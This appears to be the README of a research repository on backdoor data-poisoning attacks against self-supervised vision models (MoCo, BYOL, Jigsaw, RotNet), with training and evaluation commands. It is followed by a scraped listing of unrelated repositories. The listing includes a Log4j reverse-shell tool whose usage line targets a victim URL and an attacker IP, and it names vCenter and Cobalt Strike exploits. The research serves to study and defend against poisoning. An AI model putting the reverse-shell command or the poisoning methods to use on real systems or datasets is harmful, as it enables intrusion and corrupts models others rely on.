Official implementation of the paper "Backdoor Attacks on Self-Supervised Learning".

Overview

SSL-Backdoor

Abstract

Large-scale unlabeled data has allowed recent progress in self-supervised learning methods that learn rich visual representations. State-of-the-art self-supervised methods for learning representations from images (MoCo and BYOL) use an inductive bias that different augmentations (e.g. random crops) of an image should produce similar embeddings. We show that such methods are vulnerable to backdoor attacks where an attacker poisons a part of the unlabeled data by adding a small trigger (known to the attacker) to the images. The model performance is good on clean test images but the attacker can manipulate the decision of the model by showing the trigger at test time. Backdoor attacks have been studied extensively in supervised learning and to the best of our knowledge, we are the first to study them for self-supervised learning. Backdoor attacks are more practical in self-supervised learning since the unlabeled data is large and as a result, an inspection of the data to avoid the presence of poisoned data is prohibitive. We show that in our targeted attack, the attacker can produce many false positives for the target category by using the trigger at test time. We also develop a knowledge distillation based defense algorithm that succeeds in neutralizing the attack. Our code is available here: https://github.com/UMBCvision/SSL-Backdoor.

Paper

Backdoor Attacks on Self-Supervised Learning

Updates

  • 04/07/2021 - Poison generation code added.
  • 04/08/2021 - MoCo v2, BYOL code added.
  • 04/14/2021 - Jigsaw, RotNet code added.

Requirements

All experiments were run using the following dependencies.

  • python=3.7
  • pytorch=1.6.0
  • torchvision=0.7.0
  • wandb=0.10.21 (for BYOL)
  • torchnet=0.0.4 (for RotNet)

Optional

  • faiss=1.6.3 (for k-NN evaluation)

Create ImageNet-100 dataset

The ImageNet-100 dataset (random 100-class subset of ImageNet), commonly used in self-supervision benchmarks, was introduced in [1].

To create ImageNet-100 from ImageNet, use the provided script.

cd scripts
python create_imagenet_subset.py --subset imagenet100_classes.txt --full_imagenet_path <path> --subset_imagenet_path <path>

Poison Generation

To generate poisoned ImageNet-100 images, create your own configuration file. Some examples, which we use for our targeted attack experiments, are in the cfg directory.

  • You can choose the poisoning to be Targeted (poison only one category) or Untargeted
  • The trigger can be text or an image (We used triggers introduced in [2]).
  • The parameters of the trigger (e.g. location, size, alpha etc.) can be modified according to the experiment.
  • The poison injection rate for the training set can be modified.
  • You can choose which split to generate. "train" generates poisoned training data, "val_poisoned" poisons all the validation images for evaluation purpose. Note: The poisoned validation images are all resized and cropped to 224x224 before trigger pasting so that all poisoned images have uniform trigger size.
cd poison-generation
python generate_poison.py <configuration-file>

SSL Methods

Pytorch Custom Dataset

All images are loaded from filelists of the form given below.

<dir-name-1>/xxx.ext <target-class-index>
<dir-name-1>/xxy.ext <target-class-index>
<dir-name-1>/xxz.ext <target-class-index>

<dir-name-2>/123.ext <target-class-index>
<dir-name-2>/nsdf3.ext <target-class-index>
<dir-name-2>/asd932_.ext <target-class-index>

Evaluation

All evaluation scripts return confusion matrices for clean validation data and a csv file enumerating the TP and FP for each category.

MoCo v2 [3]

The implementation for MoCo is from https://github.com/SsnL/moco_align_uniform modified slightly to suit our experimental setup.

To train a ResNet-18 MoCo v2 model on ImageNet-100 on 2 NVIDIA GEFORCE RTX 2080 Ti GPUs:

cd moco
CUDA_VISIBLE_DEVICES=0,1 python main_moco.py \
                        -a resnet18 \
                        --lr 0.06 --batch-size 256 --multiprocessing-distributed \
                        --world-size 1 --rank 0 --aug-plus --mlp --cos --moco-align-w 0 \
                        --moco-unif-w 0 --moco-contr-w 1 --moco-contr-tau 0.2 \
                        --dist-url tcp://localhost:10005 \ 
                        --save-folder-root <path> \
                        --experiment-id <ID> <train-txt-file>

To train linear classifier on frozen MoCo v2 embeddings on ImageNet-100:

CUDA_VISIBLE_DEVICES=0 python eval_linear.py \
                        --arch moco_resnet18 \
                        --weights <SSL-model-checkpoint-path>\
                        --train_file <path> \
                        --val_file <path>

We use the linear classifier normalization from CompRess: Self-Supervised Learning by Compressing Representations which says "To reduce the computational overhead of tuning the hyperparameters per experiment, we standardize the Linear evaluation as following. We first normalize the features by L2 norm, then shift and scale each dimension to have zero mean and unit variance."

To evaluate linear classifier on clean and poisoned validation set: (This script loads the cached mean and variance from previous step.)

CUDA_VISIBLE_DEVICES=0 python eval_linear.py \
                        --arch moco_resnet18 \
                        --weights <SSL-model-checkpoint-path> \
                        --val_file <path> \
                        --val_poisoned_file <path> \
                        --resume <linear-classifier-checkpoint> \
                        --evaluate --eval_data <evaluation-ID> \
                        --load_cache

To run k-NN evaluation of frozen MoCo v2 embeddings on ImageNet-100 (faiss library needed):

CUDA_VISIBLE_DEVICES=0 python eval_knn.py \
                        -a moco_resnet18 \
                        --weights <SSL-model-checkpoint-path> \
                        --train_file <path> \
                        --val_file <path> \
                        --val_poisoned_file <path> \
                        --eval_data <evaluation-ID>

BYOL [4]

The implementation for BYOL is from https://github.com/htdt/self-supervised modified slightly to suit our experimental setup.

To train a ResNet-18 BYOL model on ImageNet-100 on 4 NVIDIA GEFORCE RTX 2080 Ti GPUs: (This scripts monitors the k-NN accuracy on clean ImageNet-100 dataset at regular intervals.)

cd byol
CUDA_VISIBLE_DEVICES=0,1,2,3 python -m train \
                                    --exp_id <ID> \
                                    --dataset imagenet --lr 2e-3 --emb 128 --method byol \
                                    --arch resnet18 --epoch 200 \
                                    --train_file_path <path> \
                                    --train_clean_file_path <path> 
                                    --val_file_path <path>
                                    --save_folder_root <path>

To train linear classifier on frozen BYOL embeddings on ImageNet-100:

CUDA_VISIBLE_DEVICES=0 python -m test --dataset imagenet \
                            --train_clean_file_path <path> \
                            --val_file_path <path> \
                            --emb 128 --method byol --arch resnet18 \
                            --fname <SSL-model-checkpoint-path>

To evaluate linear classifier on clean and poisoned validation set:

CUDA_VISIBLE_DEVICES=0 python -m test --dataset imagenet \
                            --val_file_path <path> \
                            --val_poisoned_file_path <path> \
                            --emb 128 --method byol --arch resnet18 \
                            --fname <SSL-model-checkpoint-path> \
                            --clf_chkpt <linear-classifier-checkpoint-path> \
                            --eval_data <evaluation-ID> --evaluate

Jigsaw [5]

The implementation for Jigsaw is our own Pytorch reimplementation based on the authors’ Caffe code https://github.com/MehdiNoroozi/JigsawPuzzleSolver modified slightly to suit our experimental setup. There might be some legacy Pytorch code, but that doesn't affect the correctness of training or evaluation. If you are looking for a recent Pytorch implementation of Jigsaw, https://github.com/facebookresearch/vissl is a good place to start.

To train a ResNet-18 Jigsaw model on ImageNet-100 on 1 NVIDIA GEFORCE RTX 2080 Ti GPU: (The code doesn't support Pytorch distributed training.)

cd jigsaw
CUDA_VISIBLE_DEVICES=0 python train_jigsaw.py \
                                --train_file <path> \
                                --val_file <path> \
                                --save <path>

To train linear classifier on frozen Jigsaw embeddings on ImageNet-100:

CUDA_VISIBLE_DEVICES=0 python eval_conv_linear.py \
                        -a resnet18 --train_file <path> \
                        --val_file <path> \
                        --save <path> \
                        --weights <SSL-model-checkpoint-path>

To evaluate linear classifier on clean and poisoned validation set:

CUDA_VISIBLE_DEVICES=0 python eval_conv_linear.py -a resnet18 \
                            --val_file <path> \
                            --val_poisoned_file <path> \
                            --weights <SSL-model-checkpoint-path> \
                            --resume <linear-classifier-checkpoint-path> \
                            --evaluate --eval_data <evaluation-ID>

RotNet [6]

The implementation for RotNet is from https://github.com/gidariss/FeatureLearningRotNet modified slightly to suit our experimental setup. There might be some legacy Pytorch code, but that doesn't affect the correctness of training or evaluation. If you are looking for a recent Pytorch implementation of RotNet, https://github.com/facebookresearch/vissl is a good place to start.

To train a ResNet-18 Jigsaw model on ImageNet-100 on 1 NVIDIA TITAN RTX GPU: (The code doesn't support Pytorch distributed training. Choose the experiment ID config file as required.)

cd rotnet
CUDA_VISIBLE_DEVICES=0 python main.py --exp <ImageNet100_RotNet_*> --save_folder <path>

To train linear classifier on frozen RotNet embeddings on ImageNet-100:

CUDA_VISIBLE_DEVICES=0 python main.py --exp <ImageNet100_LinearClassifiers_*> --save_folder <path>

To evaluate linear classifier on clean and poisoned validation set:

CUDA_VISIBLE_DEVICES=0 python main.py --exp <ImageNet100_LinearClassifiers_*> \
                            --save_folder <path> \
                            --evaluate --checkpoint=<epoch_num> --eval_data <evaluation-ID>

Acknowledgement

This material is based upon work partially supported by the United States Air Force under Contract No. FA8750‐19‐C‐0098, funding from SAP SE, NSF grant 1845216, and also financial assistance award number 60NANB18D279 from U.S. Department of Commerce, National Institute of Standards and Technology. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of the United States Air Force, DARPA, or other funding agencies.

References

[1] Yonglong Tian, Dilip Krishnan, and Phillip Isola. Contrastive multiview coding. arXiv preprint arXiv:1906.05849,2019.

[2] Aniruddha Saha, Akshayvarun Subramanya, and Hamed Pirsiavash. Hidden trigger backdoor attacks. In Proceedings of the AAAI Conference on Artificial Intelligence, volume 34, pages 11957–11965, 2020.

[3] Chen, Xinlei, et al. "Improved baselines with momentum contrastive learning." arXiv preprint arXiv:2003.04297 (2020).

[4] Jean-Bastien Grill, Florian Strub, Florent Altch́e, and et al. Bootstrap your own latent - a new approach to self-supervised learning. In Advances in Neural Information Processing Systems, volume 33, pages 21271–21284, 2020.

[5] Noroozi, Mehdi, and Paolo Favaro. "Unsupervised learning of visual representations by solving jigsaw puzzles." European conference on computer vision. Springer, Cham, 2016.

[6] Spyros Gidaris, Praveer Singh, and Nikos Komodakis. Unsupervised representation learning by predicting image rotations. In International Conference on Learning Representations, 2018.

Citation

If you find our paper, code or models useful, please cite us using

@article{saha2021backdoor,
  title={Backdoor Attacks on Self-Supervised Learning},
  author={Saha, Aniruddha and Tejankar, Ajinkya and Koohpayegani, Soroush Abbasi and Pirsiavash, Hamed},
  journal={arXiv preprint arXiv:2105.10123},
  year={2021}
}

Questions/Issues

Please create an issue on the Github Repo directly or contact [email protected] for any questions about the code.

Owner
UMBC Vision
The Computer Vision Lab at the University of Maryland, Baltimore County (UMBC)
UMBC Vision
Log4j2 CVE-2021-44228 revshell

Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At

FaisalFs 16 Mar 24, 2022
Add a Web Server based on Rogue Mysql Server to allow remote user get

介绍 对于需要使用 Rogue Mysql Server 的漏洞来说,若想批量检测这种漏洞的话需要自备一个服务器。并且我常用的Rogue Mysql Server 脚本 不支持动态更改读取文件名、不支持远程用户访问读取结果、不支持批量化检测网站。于是乎萌生了这个小脚本的想法 Rogue-MySql-

6 May 17, 2022
CVE-log4j CheckMK plugin

CVE-2021-44228-log4j discovery (Download the MKP package) This plugin discovers vulnerable files for the CVE-2021-44228-log4j issue. To discover this

4 Jan 08, 2022
Cve-2021-22005-exp

cve-2021-22005-exp 0x01 漏洞简介 2021年9月21日,VMware发布安全公告,公开披露了vCenter Server中的19个安全漏洞,这些漏洞的CVSSv3评分范围为4.3-9.8。 其中,最为严重的漏洞为vCenter Server 中的任意文件上传漏洞(CVE-20

Jing Ling 146 Dec 31, 2022
🍯 16 honeypots in a single pypi package (DNS, HTTP Proxy, HTTP, HTTPS, SSH, POP3, IMAP, STMP, VNC, SMB, SOCKS5, Redis, TELNET, Postgres & MySQL)

Easy to setup customizable honeypots for monitoring network traffic, bots activities and username\password credentials. The current available honeypot

QeeqBox 259 Dec 31, 2022
CVE-2021-36798 Exp: Cobalt Strike < 4.4 Dos

A denial of service (DoS) vulnerability (CVE-2021-36798) was found in Cobalt Strike. The vulnerability was fixed in the scope of the 4.4 release. More

104 Nov 09, 2022
LdapRelayScan - Check for LDAP protections regarding the relay of NTLM authentication

LDAP Relay Scan A tool to check Domain Controllers for LDAP server protections r

315 Dec 18, 2022
Exploiting CVE-2021-44228 in vCenter for remote code execution and more

Log4jCenter Exploiting CVE-2021-44228 in vCenter for remote code execution and more. Blog post detailing exploitation linked below: COMING SOON Why? P

81 Dec 20, 2022
Trainspotting - Python Dependency Injector based on interface binding

Choose dependency injection Friendly with MyPy Supports lazy injections Supports

avito.tech 3 Jan 26, 2022
Script hecho en python para sacar la informacion del numero de telefono, Hecha con el API de numverify

Script hecho en python para sacar la informacion del numero de telefono, Hecha con el API de numverify

DW Dariel 5 Dec 03, 2022
Js File Scanner This is Js File Scanner

Js File Scanner This is Js File Scanner . Which are scan in js file and find juicy information Toke,Password Etc.

122 Dec 12, 2022
This script checks for any possible SSRF dns/http interactions in xmlrpc.php pingback feature

rpckiller This script checks for any possible SSRF dns/http interactions in xmlrpc.php pingback feature and with that you can further try to escalate

Ashish Kunwar 33 Sep 23, 2022
Simple tool to create passwords.

PasswordGenerator Simple password generator: -Simplisitc Window Application -Allows Numbers, Symbols & letters upper and lowercase -Restricts rows of

DM 1 Jan 10, 2022
Unicode fuzzer for various purposes

UnicodeToy Unicode fuzzer for various purposes Unicode based on version 14.0 features Generate the shortest xss domain payload Generate unicode str, u

33 Nov 27, 2022
Natural Language Processing - Sommer Semester 2022

Natural Language Processing (DIS25a/NLP) This course can be taken for the Bachelor Programm Data and Information Science (DIS25a) or the Master Progra

Classrooms of IR Group at Technische Hochschule Köln 19 Sep 07, 2022
Recon is a script to perform a full recon on a target with the main tools to search for vulnerabilities.

👑 Recon 👑 The step of recognizing a target in both Bug Bounties and Pentest can be very time-consuming. Thinking about it, I decided to create my ow

Dirso 171 Dec 31, 2022
Script Crack Facebook Premium 🚶‍♂

prem Script Crack Facebook Premium 🚶‍♂ Install Script $ pkg update && pkg update $ termux-setup-storage $ pkg install git $ pkg install python $ pip

Yumasaa 1 Dec 03, 2021
Password-Manager - This app can generate ,save , find and delete passwords.

Password-Manager This app can generate ,save , find and delete passwords. In the StartUp() Function , there are three buttons to choose from : Generat

1 Jan 01, 2022
Bypass 4xx HTTP response status codes.

Forbidden Bypass 4xx HTTP response status codes. To see all the test cases, check the source code - follow the NOTE comments. Script uses multithreadi

Ivan Šincek 165 Dec 28, 2022
Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)

Pachine Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation). Installtion $ pip3 install impacket Usage Impacket v0.9.23 -

Oliver Lyak 250 Dec 31, 2022